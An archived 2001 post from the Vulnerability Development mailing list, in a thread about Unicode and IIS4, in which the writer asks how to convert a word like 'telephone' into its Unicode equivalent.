Vulnerability Development mailing list archives

Re: [unicode / iis4]PLEASE HELP ME.

From: Fabrizio Siciliano <fsiciliano () EARTHLINK NET>
Date: Wed, 24 Jan 2001 20:41:52 -0500

Hi everyone...
I've noticed alot of these Unicode-type-of-questions. Sure, send me a flame
if this question was already on the list, but, let's say I have a
word...ummm, "telephone". How do I actually go about finding the unicode
equivalent to that? I've looked for converters, but couldn't find any. Can
anyone help me out there? THANK YOU ALL!
                                                -Fab